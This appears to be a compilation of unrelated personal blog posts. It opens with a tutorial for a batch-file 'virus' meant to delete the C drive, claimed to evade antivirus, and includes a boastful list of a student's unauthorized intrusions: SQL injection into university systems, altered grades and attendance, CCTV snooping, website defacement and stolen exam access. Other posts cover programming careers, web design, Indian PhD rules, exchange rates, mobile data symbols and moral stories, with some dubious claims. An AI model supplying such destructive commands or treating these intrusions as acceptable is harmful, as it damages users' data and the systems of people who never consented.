Dangerous Virus in 2 minutes(Not Magi Noodles)

In previous post I had teach you guys a path way to software engineer. In this post i will teach you to make

simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to

make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any
AntiVirus.

What will this virus do ?

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good  thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

    @Echo off
    Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I

will not be responsible for any damage done to your computer.

Path way for software Engineer

I live in Silicon Valley, where a significant portion of the greatest programmers of the world live and work.  And I can tell you for the fact that less than even 1% of these guys have a PhD in anything -- PL included!

There are billion resources available in the Internet for learning anything and everything and on top of it, every single day new websites and free books are published to help people learn coding.  Even President Obama is now learning Javascript.

So what you need, in my humble opinion, is:
  1. You MUST be Passionate
If you are not passionate about learning, thinking logically, and solving problems, then you simply cannot become a great programmer.  You should be as passionate as hell to suffer all the rip offs of dealing with a stupid box called computer, and still smile!
This is like breeding.  Doing it the way everyone else in the room does is so easy that sometimes it happens without you doing anything special!  But if you want to raise a great child, you should be loving him/her first.  And this is your child within that now wants to learn a new game, called programming.
  2. Persistency -- KEEP PUUUUSHING!
There are a million things that can stop you at mediocre/good level.  But to keep going up, you need to keep pushing.  Never give up, always keep reading new article, play around with new technologies, try out all cool stuffs that you can find, and enhance your internal desire to discover and improve.
I remember one of the sources I first learned HTML and most of CSS2 hacks back to 2000 was "Menu>View>View Source" of the browser.  As simple as that.  And I was doing it for every single website that I was finding interesting to answer my child within when he was asking me "How did they made this header floating with background when I scroll?"
  3. Don't just read/watch, COME DO IT!
Computer Science (what's being taught at school) and Computer Engineering (what programmers are) are thousands of galaxies faaaar away from each other.  We make $200,000,000 a year in my current start-up company in San Francisco (with 2 digit developers) and half of our greatest developers doesn't even have a degree in CS!  This is the real life.  Just by reading how Java handles garbage collection using a GPU after a multi-thread job which is written using polymorphism, takes you to absolutely no where!  This is exactly like studying cellular biology to develop a six-pack.  All you need to know is what are those six items/packs, and how you can grow them, and then keep doing it.

    3.1. Embrace Open Source!
Open a github.com account RIGHT NOW! Then start forking cool projects that you can think you'll like and keep improving them.  Submit a pull request, or simply ask the author if there's any bug/feature around that you can help fixing/implementing.  Make your hands dirty.  Yes, this is the price to pay for becoming great.

3.2. Be Brave! No one is going to laugh at you
I did my first open-source web-application when I was 17 and using a dial-up connection in Iran to connect to the Internet.  And it was an amazing experience for me to see people in Spain, Portugal, France, Australia, and everywhere were using my service a week after that and asking me to add new features.  If I would have shared my idea with any of my friends they would laugh.  But all I did was hard work, not giving a $#!+ to anyone, and doing it.  It took me 6 months, $50 to buy a domain and a hosting service, 11000 lines of unmaintainable Javascript codes, an F in math in college, a shift in sleeping routine.  But the experience I got is worth a million times of what I paid.
  4. Trust in yourself! Not everything is already invented.
More than a million times this thought will come to your mind that all great ideas in the world are already implemented or are being implemented by someone in a cool place of the world right now. NOT TRUE!  Google wasn't the first search engine.  Facebook came where there was many social networks around.  Twitter was nothing but a blogging service with an if limit on number of characters that you can post.  Dropbox wasn't the first file sharing system.  Slack (software) (they went from zero to $2,800,000,000 value in a year and half!) wasn't the first chat software.
Yes, You can be the next! Trust in yourself man.

No, you don't need a mentor!
You are your own mentor.  Just believe in yourself and go learn how to learn fishing

Route Map To Web Design

Web Designing involves a lots of technologies. I am first listing the technologies involved then I'll elaborate the ways you can learn them.

  • HTML [Very Easy to learn, it's newest version is HTML 5]
  • CSS [It's all about designing the contents in a web page, CSS3 is the newest]
  • JavaScript
  • jQuery [You can skip the extensive JavaScript and start jQuery]
  • PHP [Mainly used for the back-end, being familiar with PHP will help you a lot]
  • AJAX
  • Photoshop [Most Important Tool for making your Designs
  •
  •  At the initial stage you'll need books, they are important. There are lots and lots of book on these topics but since you're beginner, I'll prefer you to read these books-
  • Html 5 Foundations -

[Trust me, you'll not find any other beginner book better than this, from my personal experience]

  • CSS3 Foundations -

Now it's time to make something for yourself.

    Here's how I did it -
    1. Start with HTML/CSS
    2. yeah, its looking good, now I must apply some effects and animations, then go to CSS3 and basic JavaScript and full jQuery.
    3. Then add facilities like Login/Register, Contact forms and all and for this you'll need PHP. So start learning that.

Learning by doing is the best thing either you be in any field.
Now it's time to make something for yourself.
Now start with JavaScript and jQuery.
    • JavaScript and jQuery will cover sufficient amount of learning material for AJAX to a web Designer.
Note: Always keep an eye on several YouTube videos whenever you feel that you're stuck.

Now about Photoshop, It'll help you to visualize your idea and modify it

    All the best web designer

Most Valuable Skill A Person Can Have For Their Entire Life.

I Love You

No you don't. How can you? Look at me. I am a mess. I don't work. No clear goal in life. I procrastinate. Need I say more?

Why are you always so hard on yourself? And please stop complaining every time?

Why do you care?

I care because you are a hell of a guy. I love you. Don't you remember you worked your ass off till last year. Now since you have taken a break no need to feel bad about it.

But my friends and relatives do not understand that. I am sure they feel I have gone mad. Some have even given a hint that they think so.

Since when do you care? Everyone has their own speed. I am sure you will catch up. You are crawling now. Soon you will walk. I am sure you will run like anything soon before you even realise.

I guess you are right. You are my best friend. Thank you for understanding. What would I do without you?

Well I have to. I love you. More than anyone. More than anything.

And I love you too.

****A conversation I had with mirror in front of me****

Skill to love your own self. Unconditionally.

This according to me is the most valuable skill a person can have for their entire life.

Think about it.

Most of the problems in life will never arise once this skill is mastered.

Computer Hacks by a Student

I was a student of 2014 batch in IIIT.

Even I haven't tracked how many hacks I made when I was a student. So, I will start from my First Semester.

1. In my first semester I along with one of my friend cracked 23 Facebook accounts in a span of 2 days. Well, we did not use keyloggers nor did we use the "remember password" technique.

2. I fiddled around with my college ERP and discovered its vulnerability to SQL injection and XSS. Apparently that ERP is used in many universities including one of the top  IITs. I used to do SQL injection to get data of students of other colleges. But never used the data.

I reported few bugs to my college, they fixed a few.

3. In my second semester I hacked through my college router and changed its settings to get maximum speed.

4. During that router hack I found many private IPs of my college. One of them was the access to CCTV Camera and there was no password in it. Yes, it was open with the username as admin and a blank password. Well, it was really fun. One day I called up one of my junior and asked him to perform some act. Obviously I was following him on the CCTV. (It is really cool when you can see all the activities going on in your college just by sitting in your hostel room!)

5. I was on a hacking spree then and found vulnerabilities and defaced a few websites!

6. I managed to hack one of the scholarship portals of my state which gives scholarship of INR 10K to eligible BTech students. I had the admin access and I could add/modify/delete any data. With admin control I used to track the status of the application forms of my friends. This was in my 5th semester.

7. I made a script and cracked ERP access of many faculties including that of the library (I actually lost a book but managed to submit it through the ERP ;) ).

8. Due to ERP access I had access to change the marks, attendance, grades and notice board! Well I helped a few friends in their attendance and obviously I enjoyed the treat afterwards :D

9. I hacked through a few faculty firewall authentications and enjoyed the premium internet speed! :D

10. Next, State Education Board for 10th class. I hacked through their server and had access to the exam question papers. But I never used them. I drafted it on my thesis paper.

11. I also hacked the admin access of state's Bus Service website. I reported them immediately, but they were too lazy then. But now when I check it, it's fixed :)

12. Okay, this is quite big. On my crush's birthday I wished her by XSSing on NASA's sub-domain. Yes! It was NASA. ;) This (Page on nasa.gov) was the sub-domain where I wished her in 2012. :D

13. Again in 2012, one of the IITs conducted their techfest. The developer of the website is a facebook friend of mine. After they launched their website with registration and online events I managed to crack the root access. It was a simple SQL injection on the LAMP stack. Later, they came to know about this. As far as I remember, I have cracked 2 more techfest sites in regional technical colleges.

14. When I learnt PHP, I had an idea of making an interactive crush finder/matcher that helps people match with their crush anonymously. If there's a match from both ends then it would reveal the profiles. But I was way too lazy to complete this and after two years I found the same idea on an Indian website Page on wizters.com. Duh! I found vulnerability in their site. But they fixed it quickly after I reported it. I hope Wizters will go a long way :)

15. In my seventh semester one software company with good package came to our college for placement (This was the only company for which I was eligible to appear). I appeared for their exam on their exam portal. Well, I was disqualified in the first round itself. :P But after two days I reported to them that I found vulnerabilities in their exam portal. They appreciated my findings, but they never hired me :'(

Ph D Talk

How to identify fake, real, recognized and not recognized M.Phil and Ph.D degree in India

People need to be aware that all degrees do not stand as valid and recognized even if it is from a UGC approved university.

I have seen two type of people

1. Who do not know anything about research and even do not know basic concept of research methodology but they want a Ph.D degree for the namesake, just for promotion and they want to get it by paying money. They do not want to do hard work, they do not want to do real, empirical research and do not want to add value to the nation through a required research. Such people are employed in 99% of our education system called colleges and universities. Such people become guide for future similar kind of Ph.D students and then we see that despite of being no.2 in population and with more than 700 universities including top class IIMs, IITs, JNTU, NITs, BITS we could not fetch more than 3 Noble prize. Whoever won, most of them were people of India origin.

2. Those who are interested to do research, some empirical research for pure interest and to earn a Ph.D degree honestly. They are hardly 1% of total population.

How an institute can award M.Phil. and  Ph.D degree in India or Which M.Phil and Ph.D degrees are valid in India?

Well, UGC is the highest authority to control higher education in India along with other statutory bodies like AICTE, MCI, PCI, NCTE etc.

UGC (Minimum standards and procedures for awards of M.Phil/ Ph.D degree) , regulation, 2009

For higher studies, for appointment (along with respective statutory body's separate requirement) all the M.Phil and Ph.D degree must be awarded in accordance with this regulation. If any university awards M.Phil or Ph.D degree by the way other than this regulation, in such case such M.Phil and Ph.D degrees are non recognized and stands invalid.

This regulation is apply to all central universities, state universities, deemed universities, private universities and colleges offering Ph.D and M.Phil degree affiliated to any university.

If we go through the regulation carefully, admission in M.Phil and Ph.D can be possible only after fulfilling following criteria:

1. The minimum qualification should be a masters degree with minimum 55% for general category and 50% for SC/ ST category.

2. The university/ institute/ college has to pre-determine no. of Ph.D seats available, then need to publish an advertisement for M.Phil/ Ph.D entrance notifying no. of seats available, date of entrance etc.. The no. of seats available must be decided on the basis of overall infrastructure including research guide available. A university/ institute cannot admit more than the predetermined seats for M.Phil and Ph. D.

3. Entrance exam is mandatory for M.Phil and Ph.D admission only following people are exempted from entrance test:

1. Those who are M.Phil holder as per this regulation.

2. Those who have qualified NET/ JRF and GATE

It is compulsory for rest all students to appear for entrance examination conducted by that particular institutes only.

Concerned university/ colleges have to send a report to UGC mentioning how many M.Phil and Ph.D seats they have. They cannot take more students mentioned than this and once admission process completed, within 15 days they have to send report to UGC mentioning name of the students and area of research. At the time of admission, the concerned university/ institute also have to take research proposal from students and carefully scrutinise it, interview it and make it part of the Ph.D selection process.

Ph. D/ M.Phil cannot be offered in distance/ external and off campus mode. It has to be a full time mode only. Only few institute offers the facility where a student can complete the research work in the organisation where they are working and where proper infrastructure for their research area is available (This is sometime called external Ph.D but it is strictly followed). However, they have to regularly visit the university and discuss about research with their guide. They may even need to attend lectures for initial 2 semesters.

IIT strictly follow this  rule and system and even for external Ph.D students, it is mandatory to spend 2 semester in the campus, full time to learn various research tools and interact with the faculty. So, if somebody is in government job including teachers and lecturers, they can easily get his leave sanctioned in the name of "study leave" however for people from private sector it may or may not be possible to take break of 1 year. I suggest UGC as well as these universities can make it little flexible by increasing the duration of the Ph.D programme and allowing people to attend campus on weekends and on holidays. Everybody cannot leave the job and there are many corporate executives who can blend their corporate experience into research and produce a practical research outcome which will help the academia and industries.  These people do not need Ph.D tag to save the job but they really want to contribute in the research field.

M.Phil/ Ph.D degree from private universities and deemed universities

As I said above, this regulation applies to private and deemed universities too. Along with this, following conditions also apply to research degree as well as other degrees from private and deemed universities:

1. Private and deemed universities cannot affiliate any college.
2. Private and deemed universities cannot start any off campus programme including Ph.D and M.Phil without prior approval of UGC
3. Private and deemed universities qualification through study centre, agencies, franchisee including off campus learning, industry collaborative learning , industry integrated learning, distance learning, online learnings are non recognized and invalid.

Safe private and deemed universities in India

In India, I consider only following private universities are safe for pursuing M.Phil and Ph.D degree. Rest most of them are in big degree scam, they even do not have mechanism to check authenticity of the research work carried. They just take money and award whatever degree you want.

Are you challenging yourself to succeed ? Put A shark in your day to day life

Dear Friends

Here is the story to motivate you in a day-to-day life.

The Japanese have always loved fresh fish. But the water close to Japan has not held many fish for decades.
So to feed the Japanese population, fishing boats got bigger and went farther than ever. The further the fishermen went, the longer it took to bring the fish.If the return trip took more time, the fish were not energetic. To solve this problem, fish companies installed freezers on their boats. They would catch the fish and freeze them at sea.Freezers allowed the boats to go farther and stay longer.

However, the Japanese could taste the difference between fresh and frozen fish and they did not like the taste of frozen fish. So, fishing companies installed fish tanks.

They would catch the fish and stuff them in the tanks, fin to fin.

After a little thrashing around, they were tired, dull, and lost their fresh-fish taste.

The fishing industry faced an impending crisis!

But today, they get fresh-tasting fish to Japan.

How did they manage...?

To keep the fish, tasting fresh, the Japanese fishing companies still put the fish, in the tanks but with a small shark, The fish are challenged and hence are constantly on the move.

The challenge they face keeps them alive and fresh!

Have you realized that some of us are also living in a pond but most of the time tired and dull....?

Basically in our lives, sharks are new challenges to keep us active.

If you are steadily conquering
challenges, you are happy.

Your challenges keep you energized.

Don’t create Success and revel in it in a state of inertia.

You have the resources, skills and abilities to make a difference.

Put a shark n your tank and see how far you can really go

Simple Explanation for Currency Exchange (Dollar to Rupee)

If a ten year old asks you why a US Dollar costs 63.2 INR, how should you explain it?

Something in line with the following conversation should help in explaining the concept to him. :)

Y: You, C: Child

Ask the 10 year old: "If you had only 10 rupee notes, and wanted to buy a chocolate of Rs. 20 what would you do?"
Child will say - "Give the shopkeeper 2 notes"

Y: "Let's go to another shop. What would you do if a better chocolate costs Rs. 50 there?"
C: "I will give shopkeeper 5 notes"

Y: "Good, There's another shop called XYZ which sells the best chocolate at Rs. 500 and accepts nothing but Rs. 100 notes. It is indeed an awesome chocolate that you will really like. What would you do then?"
C: "Give him 50 notes"

Y: "Remember the shopkeeper accepts only Rs. 100 notes?'"
C: "But I will give him the same amount of money!!"

Y: "But he uses a different system, he runs his shop only on 100 Rupee notes. But you have only 10 rupee notes. Are they of any value if you want to do business with the shop?"
C: "No. I might have to take 5*100 rupee notes from someone and give him 50 notes in return"

Y: "Good!! Let us say a man is standing outside the shop offering 100 rupee notes in exchange for 10 rupee notes..then?"
C: "Wow!! I will give 50 notes to him, and take 5*100-rupee notes"

Y: What if the person says 'Everybody seems to like the chocolate here. Everybody wants 100 rupee notes. I want 60 notes for 5*100 notes'.
Now C starts thinking.

Y: You really want the chocolate. Meanwhile another person comes and tries to buy his 100 rupee notes. If you do not buy his note quickly - he might ask for even more notes because, many people want to buy his notes

Y: "Did the value of the chocolate change?"
C: "No"

Y: "Did you have less money?"
C: "No"

Y: "Then what was the problem?"
C: "The shopkeeper wants only 100 Rupee notes!!! :( "

Y: "But finally did you end up paying more than 500 rupees for a 500 rupee chocolate?"
C: "yes!!! :("

Y: "Why? The chocolate price never changed!"
C: "The chocolate price remained the same. But the price of the 100 rupee note was more!!! :( "

Y: "That is what happens. The shop is USA. Lets call the 100 rupee note as the Dollar. Other shops are India. They accept your 10 rupee note. The 'value' lies in the thing. Money is just a medium of exchange. So its value comes from its 'level of acceptance' by people. The chocolate is the same value, but is available only in USA. If you want to do business with him, you need to give him whatever note he wants. He accepts only Dollars. Your 10 rupee note has no value - although you have as many as you want. So you have to go to somebody who has dollars. When you buy the dollar, the price depends  on how high the demand for the dollar is. It has nothing to do with the actual value of the chocolate you are buying. What happens if more and more people want the dollar?"

C: "I will have to pay more and more rupees for the same dollar" (Exchange rate)

You end with: "So when we say $1 is equal to INR 60, it means that everybody wants to buy dollars. Actually, if you want to do business with any FOREIGN country, the rule is that you should use dollars. So the price has become very high. You have to pay 60 rupees to just buy 1 dollar."

This  will explain the exchange rate, forex trading and the dollar standard concepts. But the curiosity might continue....

C: "OK, but why should everybody use the dollar? What if somebody is OK to take my 10 rupee note?"
Y: "Then ugly things happen. You will understand only when you grow up"

Internet on our smartphones for 3G/2G ?

We recharge for Internet on our smartphones for 3G/2G.
But hardly do we get to see these symbols on our phones.

Rather we see symbols like:

Now what does "H+" , "H" , "E" mean?

We'll go from Fastest To Slowest.

  • LTE (4G*) : Currently the fastest type of internet connection and is faster than many home broadband connections. The download speed being around 100Mbps. No way you are gonna get this symbol next to your signal bars on your phone. Such connection is yet to be launched and is worked on.
  • H+ (HSDPA+) : High Speed Downlink Packet Access. It's currently the fastest network connection one can enjoy with their respective service providers. Comparable to many home broadband connections. It's FASTER than 3G. The download speed being around 21Mbps.
  • H (HSDPA): Lower version of H+. With the download speed compromised at 7.2Mbps. But again, this too is FASTER than 3G.
  • 3G: Initially introduced for Video calling. Only after the launching of this Generation, the internet speed became decent. Applications like email, video calls, live streaming became possible efficiently only after this. The download speed being 2Mbps.
  • E (Edge): This is most common symbol popping up on our signal bars whenever we switch on our Mobile Data. But again, contrary of what people know, it's FASTER than 2G. It was brought into picture, as a cheap carrier to upgrade from 2G to 3G networks, without expanding the bandwidth and the frequency range. The download speed being 0.4Mbps.
  • G (General Packet Radio Service) :
This was the oldest and first "always-on" data service. While older networks exist, you aren't likely to come across them these days. It's a part of History now.The download speed being 0.1Mbps.

Summarizing the Generations and their respective speeds:

Not accepting another's anger or view on you-"A chip on your shoulder"

Buddha was walking into the city market one day and near the city entrance an old bitter man was sitting on a box glaring at Buddha, who carried a bright smile on his face. At the sight of him this old man started cursing Buddha up and down, left right and center, telling him how pretentious he was, how much better he thought he was and how he did nothing worthy of the air he breathed in this world. But Buddha simply smiled and kept on walking to the market to get what he needed.

The Next day Buddha returned to the market and once again that old man was there, this time his cursing intensified, screaming and yelling at Buddha as he walked by, cursing his mother, cursing his father and everyone else in his life.

This went on for the rest of the week and finally as the Buddha was leaving the market the man came up to him, as his curiosity had simply gotten the best of him.

“Buddha, every day you come here smiling and every day I curse your name, I curse your family and everything you believe in” the old man says ” but every day you enter this city with a smile knowing that I await you with my harsh tongue, and everyday you leave through the same entrance with that same smile. I know by speaking to you now that you are not deaf, why do you keep on smiling while I do nothing but scream the worst things I can think of to your face?”

Buddha, with the same smile still on his face looks at the old man and asks “If I were to bring you a gift tomorrow morning all wrapped up in a beautiful box would you accept it?” to which the old man replies “Absolutely not, I would take nothing from the likes of you!”. “Ah ha” the Buddha replies “Well if I were to offer you this gift and you were to refuse then who would this gift belong to?”. “It would still belong to you of course” answers the old man. “And so the same goes with your anger, when I choose not to accept your gift of anger , does it not then remain your own?” Be Cool and Stay Calm
